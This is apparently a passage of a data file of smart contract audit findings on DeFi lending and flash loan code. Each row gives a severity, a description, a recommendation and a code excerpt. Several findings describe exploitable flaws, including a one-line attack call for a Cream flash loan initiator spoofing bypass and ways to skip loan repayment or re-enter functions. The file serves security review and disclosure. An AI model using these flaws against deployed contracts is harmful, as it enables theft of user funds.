getVotes(accounts[i]));\\n\\n unchecked {\\n i++;\\n }\\n }\\n}\\n```\\n",Consider restricting access to this function for allowed accounts only.,,"```\\nfunction emitVotingBalances(address[] calldata accounts) external {\\n uint256 size = accounts.length;\\n\\n for (uint256 i = 0; i < size; ) {\\n emit DelegateVotesChanged(accounts[i], 0, getVotes(accounts[i]));\\n\\n unchecked {\\n i++;\\n }\\n }\\n}\\n```\\n" +Decreasing maxGauges does not account for users' previous gauge list size.,low,"`ERC20Gauges` contract has a `maxGauges` state variable meant to represent the maximum amount of gauges a user can allocate to. 
As per the natspec, it is meant to protect against gas DOS attacks upon token transfer to allow complicated transactions to fit in a block. There is also a function `setMaxGauges` for authorised users to decrease or increase this state variable.\\n```\\nfunction setMaxGauges(uint256 newMax) external requiresAuth {\\n uint256 oldMax = maxGauges;\\n maxGauges = newMax;\\n\\n emit MaxGaugesUpdate(oldMax, newMax);\\n}\\n```\\n\\nHowever, if it is decreased and there are users that have already reached the previous maximum that was larger, there may be unexpected behavior. All of these users' gauges will remain active and manageable, such as have user gauge weights incremented or decremented. So it could be possible that for such a user address `user_address`, numUserGauges(user_address) > `maxGauges`. While in the current contract logic this does not cause issues, `maxGauges` is a public variable that may be used by other systems. If unaccounted for, this discrepancy between the contract's `maxGauges` and the users' actual number of gauges given by `numUserGauges()` could, for example, cause gauges to be skipped or fail loops bounded by `maxGauges` in other systems' logic that try and go through all user gauges.","Either document the potential discrepancy between the user gauges size and the `maxGauges` state variable, or limit `maxGauges` to be only called within the contract thereby forcing other contracts to retrieve user gauge list size through `numUserGauges()`.",,"```\\nfunction setMaxGauges(uint256 newMax) external requiresAuth {\\n uint256 oldMax = maxGauges;\\n maxGauges = newMax;\\n\\n emit MaxGaugesUpdate(oldMax, newMax);\\n}\\n```\\n" +Accounts that claim incentives immediately before the migration will be stuck,medium,"For accounts that existed before the migration to the new incentive calculation, the following happens when they claim incentives for the first time after the migration: First, the incentives that are still owed from before the migration are 
computed according to the old formula; the incentives since the migration are calculated according to the new logic, and the two values are added together. The first part - calculating the pre-migration incentives according to the old formula - happens in function MigrateIncentives.migrateAccountFromPreviousCalculation; the following lines are of particular interest in the current context:\\n```\\nuint256 timeSinceMigration = finalMigrationTime - lastClaimTime;\\n\\n// (timeSinceMigration \\* INTERNAL\\_TOKEN\\_PRECISION \\* finalEmissionRatePerYear) / YEAR\\nuint256 incentiveRate =\\n timeSinceMigration\\n .mul(uint256(Constants.INTERNAL\\_TOKEN\\_PRECISION))\\n // Migration emission rate is stored as is, denominated in whole tokens\\n .mul(finalEmissionRatePerYear).mul(uint256(Constants.INTERNAL\\_TOKEN\\_PRECISION))\\n .div(Constants.YEAR);\\n\\n// Returns the average supply using the integral of the total supply.\\nuint256 avgTotalSupply = finalTotalIntegralSupply.sub(lastClaimIntegralSupply).div(timeSinceMigration);\\n```\\n\\nThe division in the last line will throw if `finalMigrationTime` and `lastClaimTime` are equal. This will happen if an account claims incentives immediately before the migration happens - where “immediately” means in the same block. In such a case, the account will be stuck as any attempt to claim incentives will revert.","The function should return `0` if `finalMigrationTime` and `lastClaimTime` are equal. 
Moreover, the variable name `timeSinceMigration` is misleading, as the variable doesn't store the time since the migration but the time between the last incentive claim and the migration.",,"```\\nuint256 timeSinceMigration = finalMigrationTime - lastClaimTime;\\n\\n// (timeSinceMigration \\* INTERNAL\\_TOKEN\\_PRECISION \\* finalEmissionRatePerYear) / YEAR\\nuint256 incentiveRate =\\n timeSinceMigration\\n .mul(uint256(Constants.INTERNAL\\_TOKEN\\_PRECISION))\\n // Migration emission rate is stored as is, denominated in whole tokens\\n .mul(finalEmissionRatePerYear).mul(uint256(Constants.INTERNAL\\_TOKEN\\_PRECISION))\\n .div(Constants.YEAR);\\n\\n// Returns the average supply using the integral of the total supply.\\nuint256 avgTotalSupply = finalTotalIntegralSupply.sub(lastClaimIntegralSupply).div(timeSinceMigration);\\n```\\n" +type(T).max is inclusive,low,"Throughout the codebase, there are checks whether a number can be represented by a certain type.\\n```\\nrequire(accumulatedNOTEPerNToken < type(uint128).max); // dev: accumulated NOTE overflow\\n```\\n\\n```\\nrequire(blockTime < type(uint32).max); // dev: block time overflow\\n```\\n\\n```\\nrequire(totalSupply <= type(uint96).max);\\nrequire(blockTime <= type(uint32).max);\\n```\\n\\nSometimes these checks use `<=`, sometimes they use `<`.","`type(T).max` is inclusive, i.e., it is the greatest number that can be represented with type `T`. Strictly speaking, it can and should therefore be used consistently with `<=` instead of `<`.",,```\\nrequire(accumulatedNOTEPerNToken < type(uint128).max); // dev: accumulated NOTE overflow\\n```\\n +FlasherFTM - Unsolicited invocation of the callback (CREAM auth bypass),high,"TL;DR: Anyone can call `ICTokenFlashloan(crToken).flashLoan(address(FlasherFTM), address(FlasherFTM), info.amount, params)` directly and pass validation checks in `onFlashLoan()`. 
This call forces it to accept unsolicited flash loans and execute the actions provided under the attacker's `FlashLoan.Info`.\\n`receiver.onFlashLoan(initiator, token, amount, ...)` is called when receiving a flash loan. According to EIP-3156, the `initiator` is `msg.sender` so that one can use it to check if the call to `receiver.onFlashLoan()` was unsolicited or not.\\nThird-party Flash Loan provider contracts are often upgradeable.\\nFor example, the Geist lending contract configured with this system is upgradeable. Upgradeable contracts bear the risk that one cannot assume that the contract is always running the same code. In the worst case, for example, a malicious proxy admin (leaked keys, insider, …) could upgrade the contract and perform unsolicited calls with arbitrary data to Flash Loan consumers in an attempt to exploit them. It, therefore, is highly recommended to verify that flash loan callbacks in the system can only be called if the contract was calling out to the provider to provide a Flash Loan and that the conditions of the flash loan (returned data, amount) are correct.\\nNot all Flash Loan providers implement EIP-3156 correctly.\\nCream Finance, for example, allows users to set an arbitrary `initiator` when requesting a flash loan. This deviates from EIP-3156 and was reported to the Cream development team as a security issue. Hence, anyone can spoof that `initiator` and potentially bypass authentication checks in the consumers' `receiver.onFlashLoan()`. Depending on the third-party application consuming the flash loan is doing with the funds, the impact might range from medium to critical with funds at risk. 
For example, projects might assume that the flash loan always originates from their trusted components, e.g., because they use them to refinance switching funds between pools or protocols.\\nThe `FlasherFTM` contract assumes that flash loans for the Flasher can only be initiated by authorized callers (isAuthorized) - for a reason - because it is vital that the `FlashLoan.Info calldata info` parameter only contains trusted data:\\n```\\n/\\*\\*\\n \\* @dev Routing Function for Flashloan Provider\\n \\* @param info: struct information for flashLoan\\n \\* @param \\_flashnum: integer identifier of flashloan provider\\n \\*/\\nfunction initiateFlashloan(FlashLoan.Info calldata info, uint8 \\_flashnum) external isAuthorized override {\\n if (\\_flashnum == 0) {\\n \\_initiateGeistFlashLoan(info);\\n } else if (\\_flashnum == 2) {\\n \\_initiateCreamFlashLoan(info);\\n } else {\\n revert(Errors.VL\\_INVALID\\_FLASH\\_NUMBER);\\n }\\n}\\n```\\n\\n```\\nmodifier isAuthorized() {\\n require(\\n msg.sender == \\_fujiAdmin.getController() ||\\n msg.sender == \\_fujiAdmin.getFliquidator() ||\\n msg.sender == owner(),\\n Errors.VL\\_NOT\\_AUTHORIZED\\n );\\n \\_;\\n}\\n```\\n\\nThe Cream Flash Loan initiation code requests the flash loan via ICTokenFlashloan(crToken).flashLoan(receiver=address(this), initiator=address(this), ...):\\n```\\n/\\*\\*\\n \\* @dev Initiates an CreamFinance flashloan.\\n \\* @param info: data to be passed between functions executing flashloan logic\\n \\*/\\nfunction \\_initiateCreamFlashLoan(FlashLoan.Info calldata info) internal {\\n address crToken = info.asset == \\_FTM\\n ? 
0xd528697008aC67A21818751A5e3c58C8daE54696\\n : \\_crMappings.addressMapping(info.asset);\\n\\n // Prepara data for flashloan execution\\n bytes memory params = abi.encode(info);\\n\\n // Initialize Instance of Cream crLendingContract\\n ICTokenFlashloan(crToken).flashLoan(address(this), address(this), info.amount, params);\\n}\\n```\\n\\nNote: The Cream implementation does not send `sender=msg.sender` to the `onFlashLoan()` callback - like any other flash loan provider does and EIP-3156 suggests - but uses the value that was passed in as `initiator` when requesting the callback. This detail completely undermines the authentication checks implemented in `onFlashLoan` as the `sender` value cannot be trusted.\\n```\\naddress initiator,\\n```\\n\\n```\\n \\*/\\nfunction onFlashLoan(\\n address sender,\\n address underlying,\\n uint256 amount,\\n uint256 fee,\\n bytes calldata params\\n) external override returns (bytes32) {\\n // Check Msg. Sender is crToken Lending Contract\\n // from IronBank because ETH on Cream cannot perform a flashloan\\n address crToken = underlying == \\_WFTM\\n ? 0xd528697008aC67A21818751A5e3c58C8daE54696\\n : \\_crMappings.addressMapping(underlying);\\n require(msg.sender == crToken && address(this) == sender, Errors.VL\\_NOT\\_AUTHORIZED);\\n```\\n","Cream Finance\\nWe've reached out to the Cream developer team, who have confirmed the issue. They are planning to implement countermeasures. Our recommendation can be summarized as follows:\\nImplement the EIP-3156 compliant version of flashLoan() with initiator hardcoded to `msg.sender`.\\nFujiDAO (and other flash loan consumers)\\nWe recommend not assuming that `FlashLoan.Info` contains trusted or even validated data when a third-party flash loan provider provides it! Developers should ensure that the data received was provided when the flash loan was requested.\\nThe contract should reject unsolicited flash loans. 
In the scenario where a flash loan provider is exploited, the risk of an exploited trust relationship is less likely to spread to the rest of the system.\\nThe Cream `initiator` provided to the `onFlashLoan()` callback cannot be trusted until the Cream developers fix this issue. The `initiator` can easily be spoofed to perform unsolicited flash loans. We, therefore, suggest:\\nValidate that the `initiator` value is the `flashLoan()` caller. This conforms to the standard and is hopefully how the Cream team is fixing this, and\\nEnsure the implementation tracks its own calls to `flashLoan()` in a state-variable semaphore, i.e. store the flash loan data/hash in a temporary state-variable that is only set just before calling `flashLoan()` until being called back in `onFlashLoan()`. The received data can then be verified against the stored artifact. This is a safe way of authenticating and verifying callbacks.\\nValues received from untrusted third parties should always be validated with the utmost scrutiny.\\nSmart contract upgrades are risky, so we recommend implementing the means to pause certain flash loan providers.\\nEnsure that flash loan handler functions should never re-enter the system. This provides additional security guarantees in case a flash loan provider gets breached.\\nNote: The Fuji development team implemented a hotfix to prevent unsolicited calls from Cream by storing the `hash(FlashLoan.info)` in a state variable just before requesting the flash loan. Inside the `onFlashLoan` callback, this state is validated and cleared accordingly.\\nAn improvement to this hotfix would be, to check `_paramsHash` before any external calls are made and clear it right after validation at the beginning of the function. Additionally, `hash==0x0` should be explicitly disallowed. 
By doing so, the check also serves as a reentrancy guard and helps further reduce the risk of a potentially malicious flash loan re-entering the function.",,"```\\n/\\*\\*\\n \\* @dev Routing Function for Flashloan Provider\\n \\* @param info: struct information for flashLoan\\n \\* @param \\_flashnum: integer identifier of flashloan provider\\n \\*/\\nfunction initiateFlashloan(FlashLoan.Info calldata info, uint8 \\_flashnum) external isAuthorized override {\\n if (\\_flashnum == 0) {\\n \\_initiateGeistFlashLoan(info);\\n } else if (\\_flashnum == 2) {\\n \\_initiateCreamFlashLoan(info);\\n } else {\\n revert(Errors.VL\\_INVALID\\_FLASH\\_NUMBER);\\n }\\n}\\n```\\n" +Lack of reentrancy protection in token interactions,high,"Token operations may potentially re-enter the system. For example, `univTransfer` may perform a low-level `to.call{value}()` and, depending on the token's specification (e.g. `ERC-20` extension or `ERC-20` compliant ERC-777), `token` may implement callbacks when being called as `token.safeTransfer(to, amount)` (or token.transfer*()).\\nTherefore, it is crucial to strictly adhere to the checks-effects pattern and safeguard affected methods using a mutex.\\n```\\nfunction univTransfer(\\n IERC20 token,\\n address payable to,\\n uint256 amount\\n) internal {\\n if (amount > 0) {\\n if (isFTM(token)) {\\n (bool sent, ) = to.call{ value: amount }("""");\\n require(sent, ""Failed to send Ether"");\\n } else {\\n token.safeTransfer(to, amount);\\n }\\n }\\n}\\n```\\n\\n`withdraw` is `nonReentrant` while `paybackAndWithdraw` is not, which appears to be inconsistent\\n```\\n/\\*\\*\\n \\* @dev Paybacks the underlying asset and withdraws collateral in a single function call from activeProvider\\n \\* @param \\_paybackAmount: amount of underlying asset to be payback, pass -1 to pay full amount\\n \\* @param \\_collateralAmount: amount of collateral to be withdrawn, pass -1 to withdraw maximum amount\\n \\*/\\nfunction paybackAndWithdraw(int256 
\\_paybackAmount, int256 \\_collateralAmount) external payable {\\n updateF1155Balances();\\n \\_internalPayback(\\_paybackAmount);\\n \\_internalWithdraw(\\_collateralAmount);\\n}\\n```\\n\\n```\\n/\\*\\*\\n \\* @dev Paybacks Vault's type underlying to activeProvider - called by users\\n \\* @param \\_repayAmount: token amount of underlying to repay, or\\n \\* pass any 'negative number' to repay full ammount\\n \\* Emits a {Repay} event.\\n \\*/\\nfunction payback(int256 \\_repayAmount) public payable override {\\n updateF1155Balances();\\n \\_internalPayback(\\_repayAmount);\\n}\\n```\\n\\n`depositAndBorrow` is not `nonReentrant` while `borrow()` is which appears to be inconsistent\\n```\\n/\\*\\*\\n \\* @dev Deposits collateral and borrows underlying in a single function call from activeProvider\\n \\* @param \\_collateralAmount: amount to be deposited\\n \\* @param \\_borrowAmount: amount to be borrowed\\n \\*/\\nfunction depositAndBorrow(uint256 \\_collateralAmount, uint256 \\_borrowAmount) external payable {\\n updateF1155Balances();\\n \\_internalDeposit(\\_collateralAmount);\\n \\_internalBorrow(\\_borrowAmount);\\n}\\n```\\n\\n```\\n/\\*\\*\\n \\* @dev Borrows Vault's type underlying amount from activeProvider\\n \\* @param \\_borrowAmount: token amount of underlying to borrow\\n \\* Emits a {Borrow} event.\\n \\*/\\nfunction borrow(uint256 \\_borrowAmount) public override nonReentrant {\\n updateF1155Balances();\\n \\_internalBorrow(\\_borrowAmount);\\n}\\n```\\n\\nHere's an example call stack for `depositAndBorrow` that outlines how a reentrant `ERC20` token (e.g. ERC777) may call back into `depositAndBorrow` again, `updateBalances` twice in the beginning before tokens are even transferred and then continues to call `internalDeposit`, `internalBorrow`, `internalBorrow` without an update before the 2nd borrow. 
Note that both `internalDeposit` and `internalBorrow` read indexes that may now be outdated.\\n```\\ndepositAndBorrow\\n updateBalances\\n internalDeposit ->\\n ERC777(collateralAsset).safeTransferFrom() ---> calls back!\\n ---callback:beforeTokenTransfer---->\\n !! depositAndBorrow\\n updateBalances\\n internalDeposit\\n --> ERC777.safeTransferFrom()\\n <--\\n \\_deposit\\n mint\\n internalBorrow\\n mint\\n \\_borrow\\n ERC777(borrowAsset).univTransfer(msg.sender) --> might call back\\n\\n <-------------------------------\\n \\_deposit\\n mint\\n internalBorrow\\n mint\\n \\_borrow \\n --> ERC777(borrowAsset).univTransfer(msg.sender) --> might call back\\n <--\\n```\\n","Consider decorating methods that may call back to untrusted sources (i.e., native token transfers, callback token operations) as `nonReentrant` and strictly follow the checks-effects pattern for all contracts in the code-base.",,"```\\nfunction univTransfer(\\n IERC20 token,\\n address payable to,\\n uint256 amount\\n) internal {\\n if (amount > 0) {\\n if (isFTM(token)) {\\n (bool sent, ) = to.call{ value: amount }("""");\\n require(sent, ""Failed to send Ether"");\\n } else {\\n token.safeTransfer(to, amount);\\n }\\n }\\n}\\n```\\n" +Unchecked Return Values - ICErc20 repayBorrow,high,"`ICErc20.repayBorrow` returns a non-zero uint on error. Multiple providers do not check for this error condition and might return `success` even though `repayBorrow` failed, returning an error code.\\nThis can potentially allow a malicious user to call `paybackAndWithdraw()` while not repaying by causing an error in the sub-call to `Compound.repayBorrow()`, which ends up being silently ignored. 
Due to the missing success condition check, execution continues normally with `_internalWithdraw()`.\\nAlso, see issue 4.5.\\n```\\nfunction repayBorrow(uint256 repayAmount) external returns (uint256);\\n```\\n\\nThe method may return an error due to multiple reasons:\\n```\\nfunction repayBorrowInternal(uint repayAmount) internal nonReentrant returns (uint, uint) {\\n uint error = accrueInterest();\\n if (error != uint(Error.NO\\_ERROR)) {\\n // accrueInterest emits logs on errors, but we still want to log the fact that an attempted borrow failed\\n return (fail(Error(error), FailureInfo.REPAY\\_BORROW\\_ACCRUE\\_INTEREST\\_FAILED), 0);\\n }\\n // repayBorrowFresh emits repay-borrow-specific logs on errors, so we don't need to\\n return repayBorrowFresh(msg.sender, msg.sender, repayAmount);\\n}\\n```\\n\\n```\\nif (allowed != 0) {\\n return (failOpaque(Error.COMPTROLLER\\_REJECTION, FailureInfo.REPAY\\_BORROW\\_COMPTROLLER\\_REJECTION, allowed), 0);\\n}\\n\\n/\\* Verify market's block number equals current block number \\*/\\nif (accrualBlockNumber != getBlockNumber()) {\\n return (fail(Error.MARKET\\_NOT\\_FRESH, FailureInfo.REPAY\\_BORROW\\_FRESHNESS\\_CHECK), 0);\\n}\\n\\nRepayBorrowLocalVars memory vars;\\n\\n/\\* We remember the original borrowerIndex for verification purposes \\*/\\nvars.borrowerIndex = accountBorrows[borrower].interestIndex;\\n\\n/\\* We fetch the amount the borrower owes, with accumulated interest \\*/\\n(vars.mathErr, vars.accountBorrows) = borrowBalanceStoredInternal(borrower);\\nif (vars.mathErr != MathError.NO\\_ERROR) {\\n return (failOpaque(Error.MATH\\_ERROR, FailureInfo.REPAY\\_BORROW\\_ACCUMULATED\\_BALANCE\\_CALCULATION\\_FAILED, uint(vars.mathErr)), 0);\\n}\\n```\\n\\nMultiple providers, here are some examples:\\n```\\n // Check there is enough balance to pay\\n require(erc20token.balanceOf(address(this)) >= \\_amount, ""Not-enough-token"");\\n erc20token.univApprove(address(cyTokenAddr), \\_amount);\\n 
cyToken.repayBorrow(\\_amount);\\n}\\n```\\n\\n```\\nrequire(erc20token.balanceOf(address(this)) >= \\_amount, ""Not-enough-token"");\\nerc20token.univApprove(address(cyTokenAddr), \\_amount);\\ncyToken.repayBorrow(\\_amount);\\n```\\n\\n```\\nif (\\_isETH(\\_asset)) {\\n // Create a reference to the corresponding cToken contract\\n ICEth cToken = ICEth(cTokenAddr);\\n\\n cToken.repayBorrow{ value: msg.value }();\\n} else {\\n // Create reference to the ERC20 contract\\n IERC20 erc20token = IERC20(\\_asset);\\n\\n // Create a reference to the corresponding cToken contract\\n ICErc20 cToken = ICErc20(cTokenAddr);\\n\\n // Check there is enough balance to pay\\n require(erc20token.balanceOf(address(this)) >= \\_amount, ""Not-enough-token"");\\n erc20token.univApprove(address(cTokenAddr), \\_amount);\\n cToken.repayBorrow(\\_amount);\\n}\\n```\\n",Check for `cyToken.repayBorrow(_amount) != 0` or `Error.NO_ERROR`.,,```\\nfunction repayBorrow(uint256 repayAmount) external returns (uint256);\\n```\\n +"Unchecked Return Values - IComptroller exitMarket, enterMarket",high,"`IComptroller.exitMarket()`, `IComptroller.enterMarkets()` may return a non-zero uint on error but none of the Providers check for this error condition. 
Together with issue 4.10, this might suggest that unchecked return values may be a systemic problem.\\nHere's the upstream implementation:\\n```\\nif (amountOwed != 0) {\\n return fail(Error.NONZERO\\_BORROW\\_BALANCE, FailureInfo.EXIT\\_MARKET\\_BALANCE\\_OWED);\\n}\\n\\n/\\* Fail if the sender is not permitted to redeem all of their tokens \\*/\\nuint allowed = redeemAllowedInternal(cTokenAddress, msg.sender, tokensHeld);\\nif (allowed != 0) {\\n return failOpaque(Error.REJECTION, FailureInfo.EXIT\\_MARKET\\_REJECTION, allowed);\\n}\\n```\\n\\n```\\n /\\*\\*\\n \\* @notice Removes asset from sender's account liquidity calculation\\n \\* @dev Sender must not have an outstanding borrow balance in the asset,\\n \\* or be providing necessary collateral for an outstanding borrow.\\n \\* @param cTokenAddress The address of the asset to be removed\\n \\* @return Whether or not the account successfully exited the market\\n \\*/\\n function exitMarket(address cTokenAddress) external returns (uint) {\\n CToken cToken = CToken(cTokenAddress);\\n /\\* Get sender tokensHeld and amountOwed underlying from the cToken \\*/\\n (uint oErr, uint tokensHeld, uint amountOwed, ) = cToken.getAccountSnapshot(msg.sender);\\n require(oErr == 0, ""exitMarket: getAccountSnapshot failed""); // semi-opaque error code\\n\\n /\\* Fail if the sender has a borrow balance \\*/\\n if (amountOwed != 0) {\\n return fail(Error.NONZERO\\_BORROW\\_BALANCE, FailureInfo.EXIT\\_MARKET\\_BALANCE\\_OWED);\\n }\\n\\n /\\* Fail if the sender is not permitted to redeem all of their tokens \\*/\\n uint allowed = redeemAllowedInternal(cTokenAddress, msg.sender, tokensHeld);\\n if (allowed != 0) {\\n return failOpaque(Error.REJECTION, FailureInfo.EXIT\\_MARKET\\_REJECTION, allowed);\\n }\\n```\\n\\nUnchecked return value `exitMarket`\\nAll Providers exhibit the same issue, probably due to code reuse. (also see https://github.com/ConsenSysDiligence/fuji-protocol-audit-2022-02/issues/19). 
Some examples:\\n```\\nfunction \\_exitCollatMarket(address \\_cyTokenAddress) internal {\\n // Create a reference to the corresponding network Comptroller\\n IComptroller comptroller = IComptroller(\\_getComptrollerAddress());\\n\\n comptroller.exitMarket(\\_cyTokenAddress);\\n}\\n```\\n\\n```\\nfunction \\_exitCollatMarket(address \\_cyTokenAddress) internal {\\n // Create a reference to the corresponding network Comptroller\\n IComptroller comptroller = IComptroller(\\_getComptrollerAddress());\\n\\n comptroller.exitMarket(\\_cyTokenAddress);\\n}\\n```\\n\\n```\\nfunction \\_exitCollatMarket(address \\_cTokenAddress) internal {\\n // Create a reference to the corresponding network Comptroller\\n IComptroller comptroller = IComptroller(\\_getComptrollerAddress());\\n\\n comptroller.exitMarket(\\_cTokenAddress);\\n}\\n```\\n\\n```\\nfunction \\_exitCollatMarket(address \\_cyTokenAddress) internal {\\n // Create a reference to the corresponding network Comptroller\\n IComptroller comptroller = IComptroller(\\_getComptrollerAddress());\\n\\n comptroller.exitMarket(\\_cyTokenAddress);\\n}\\n```\\n\\nUnchecked return value `enterMarkets` (Note that `IComptroller` returns `NO_ERROR` when already joined to `enterMarkets`.\\nAll Providers exhibit the same issue, probably due to code reuse. (also see https://github.com/ConsenSysDiligence/fuji-protocol-audit-2022-02/issues/19). 
For example:\\n```\\nfunction \\_enterCollatMarket(address \\_cyTokenAddress) internal {\\n // Create a reference to the corresponding network Comptroller\\n IComptroller comptroller = IComptroller(\\_getComptrollerAddress());\\n\\n address[] memory cyTokenMarkets = new address[](1);\\n cyTokenMarkets[0] = \\_cyTokenAddress;\\n comptroller.enterMarkets(cyTokenMarkets);\\n}\\n```\\n",Require that return value is `ERROR.NO_ERROR` or `0`.,,"```\\nif (amountOwed != 0) {\\n return fail(Error.NONZERO\\_BORROW\\_BALANCE, FailureInfo.EXIT\\_MARKET\\_BALANCE\\_OWED);\\n}\\n\\n/\\* Fail if the sender is not permitted to redeem all of their tokens \\*/\\nuint allowed = redeemAllowedInternal(cTokenAddress, msg.sender, tokensHeld);\\nif (allowed != 0) {\\n return failOpaque(Error.REJECTION, FailureInfo.EXIT\\_MARKET\\_REJECTION, allowed);\\n}\\n```\\n" +Fliquidator - excess funds of native tokens are not returned,medium,"`FliquidatorFTM.batchLiquidate` accepts the `FTM` native token and checks if at least an amount of `debtTotal` was provided with the call. The function continues using the `debtTotal` value. If a caller provides msg.value > `debtTotal`, excess funds are not returned and remain in the contract. `FliquidatorFTM` is not upgradeable, and there is no way to recover the surplus funds.\\n```\\nif (vAssets.borrowAsset == FTM) {\\n require(msg.value >= debtTotal, Errors.VL\\_AMOUNT\\_ERROR);\\n} else {\\n```\\n",Consider returning excess funds. Consider making `_constructParams` public to allow the caller to pre-calculate the `debtTotal` that needs to be provided with the call.\\nConsider removing support for native token `FTM` entirely to reduce the overall code complexity. 
The wrapped equivalent can be used instead.,,"```\\nif (vAssets.borrowAsset == FTM) {\\n require(msg.value >= debtTotal, Errors.VL\\_AMOUNT\\_ERROR);\\n} else {\\n```\\n" +Unsafe arithmetic casts,medium,"The reason for using signed integers in some situations appears to be to use negative values as an indicator to withdraw everything. Using a whole bit of uint256 for this is quite a lot when using `type(uint256).max` would equal or better serve as a flag to withdraw everything.\\nFurthermore, even though the code uses `solidity 0.8.x`, which safeguards arithmetic operations against under/overflows, arithmetic typecast is not protected.\\nAlso, see issue 4.9 for a related issue.\\n```\\n⇒ solidity-shell\\n\\n🚀 Entering interactive Solidity ^0.8.11 shell. '.help' and '.exit' are your friends.\\n » ℹ️ ganache-mgr: starting temp. ganache instance // rest of code\\n » uint(int(-100))\\n115792089237316195423570985008687907853269984665640564039457584007913129639836\\n » int256(uint(2\\*\\*256-100))\\n-100\\n```\\n\\n```\\n// Compute how much collateral needs to be swapt\\nuint256 collateralInPlay = \\_getCollateralInPlay(\\n vAssets.collateralAsset,\\n vAssets.borrowAsset,\\n debtTotal + bonus\\n);\\n\\n// Burn f1155\\n\\_burnMulti(addrs, borrowBals, vAssets, \\_vault, f1155);\\n\\n// Withdraw collateral\\nIVault(\\_vault).withdrawLiq(int256(collateralInPlay));\\n```\\n\\n```\\n// Compute how much collateral needs to be swapt for all liquidated users\\nuint256 collateralInPlay = \\_getCollateralInPlay(\\n vAssets.collateralAsset,\\n vAssets.borrowAsset,\\n \\_amount + \\_flashloanFee + bonus\\n);\\n\\n// Burn f1155\\n\\_burnMulti(\\_addrs, \\_borrowBals, vAssets, \\_vault, f1155);\\n\\n// Withdraw collateral\\nIVault(\\_vault).withdrawLiq(int256(collateralInPlay));\\n```\\n\\n```\\nuint256 amount = \\_amount < 0 ? 
debtTotal : uint256(\\_amount);\\n```\\n\\n```\\nfunction withdrawLiq(int256 \\_withdrawAmount) external override nonReentrant onlyFliquidator {\\n // Logic used when called by Fliquidator\\n \\_withdraw(uint256(\\_withdrawAmount), address(activeProvider));\\n IERC20Upgradeable(vAssets.collateralAsset).univTransfer(\\n payable(msg.sender),\\n uint256(\\_withdrawAmount)\\n );\\n}\\n```\\n\\npot. unsafe truncation (unlikely)\\n```\\nfunction updateState(uint256 \\_assetID, uint256 newBalance) external override onlyPermit {\\n uint256 total = totalSupply(\\_assetID);\\n if (newBalance > 0 && total > 0 && newBalance > total) {\\n uint256 newIndex = (indexes[\\_assetID] \\* newBalance) / total;\\n indexes[\\_assetID] = uint128(newIndex);\\n }\\n}\\n```\\n","If negative values are only used as a flag to indicate that all funds should be used for an operation, use `type(uint256).max` instead. It is wasting less value-space for a simple flag than using the uint256 high-bit range. Avoid typecast where possible. Use `SafeCast` instead or verify that the casts are safe because the values they operate on cannot under- or overflow. Add inline code comments if that's the case.",,```\\n⇒ solidity-shell\\n\\n🚀 Entering interactive Solidity ^0.8.11 shell. '.help' and '.exit' are your friends.\\n » ℹ️ ganache-mgr: starting temp. ganache instance // rest of code\\n » uint(int(-100))\\n115792089237316195423570985008687907853269984665640564039457584007913129639836\\n » int256(uint(2\\*\\*256-100))\\n-100\\n```\\n +Missing input validation on flash close fee factors,medium,"The `FliquidatorFTM` contract allows authorized parties to set the flash close fee factor. The factor is provided as two integers denoting numerator and denominator. Due to a lack of boundary checks, it is possible to set unrealistically high factors, which go well above 1. 
This can have unexpected effects on internal accounting and the impact of flashloan balances.\\n```\\nfunction setFlashCloseFee(uint64 \\_newFactorA, uint64 \\_newFactorB) external isAuthorized {\\n flashCloseF.a = \\_newFactorA;\\n flashCloseF.b = \\_newFactorB;\\n```\\n",Add a requirement making sure that `flashCloseF.a <= flashCloseF.b`.,,"```\\nfunction setFlashCloseFee(uint64 \\_newFactorA, uint64 \\_newFactorB) external isAuthorized {\\n flashCloseF.a = \\_newFactorA;\\n flashCloseF.b = \\_newFactorB;\\n```\\n" +Separation of concerns and consistency in vaults,medium,"The `FujiVaultFTM` contract contains multiple balance-changing functions. Most notably, `withdraw` is passed an `int256` denoted amount parameter. Negative values of this parameter are given to the `_internalWithdraw` function, where they trigger the withdrawal of all collateral. This approach can result in accounting mistakes in the future as beyond a certain point in the vault's accounting; amounts are expected to be only positive. Furthermore, the concerns of withdrawing and entirely withdrawing are not separated.\\nThe above issue applies analogously to the `payback` function and its dependency on `_internalPayback`.\\nFor consistency, `withdrawLiq` also takes an `int256` amount parameter. This function is only accessible to the `Fliquidator` contract and withdraws collateral from the active provider. However, all occurrences of the `_withdrawAmount` parameter are cast to `uint256`.\\nThe `withdraw` entry point:\\n```\\nfunction withdraw(int256 \\_withdrawAmount) public override nonReentrant {\\n updateF1155Balances();\\n \\_internalWithdraw(\\_withdrawAmount);\\n}\\n```\\n\\n_internalWithdraw's negative amount check:\\n```\\nuint256 amountToWithdraw = \\_withdrawAmount < 0\\n ? 
providedCollateral - neededCollateral\\n : uint256(\\_withdrawAmount);\\n```\\n\\nThe `withdrawLiq` entry point for the Fliquidator:\\n```\\nfunction withdrawLiq(int256 \\_withdrawAmount) external override nonReentrant onlyFliquidator {\\n // Logic used when called by Fliquidator\\n \\_withdraw(uint256(\\_withdrawAmount), address(activeProvider));\\n IERC20Upgradeable(vAssets.collateralAsset).univTransfer(\\n payable(msg.sender),\\n uint256(\\_withdrawAmount)\\n );\\n}\\n```\\n","We recommend splitting the `withdraw(int256)` function into two: `withdraw(uint256)` and `withdrawAll()`. These will provide the same functionality while rendering the updated code of `_internalWithdraw` easier to read, maintain, and harder to manipulate. The recommendation applies to `payback` and `_internalPayback`.\\nSimilarly, withdrawLiq's parameter should be a `uint256` to prevent unnecessary casts.",,```\\nfunction withdraw(int256 \\_withdrawAmount) public override nonReentrant {\\n updateF1155Balances();\\n \\_internalWithdraw(\\_withdrawAmount);\\n}\\n```\\n +Aave/Geist Interface declaration mismatch and unchecked return values,medium,"The two lending providers, Geist & Aave, do not seem to be directly affiliated even though one is a fork of the other. However, the interfaces may likely diverge in the future. Using the same interface declaration for both protocols might become problematic with future upgrades to either protocol. The interface declaration does not seem to come from the original upstream project. The interface `IAaveLendingPool` does not declare any return values while some of the functions called in Geist or Aave return them.\\nNote: that we have not verified all interfaces for correctness. 
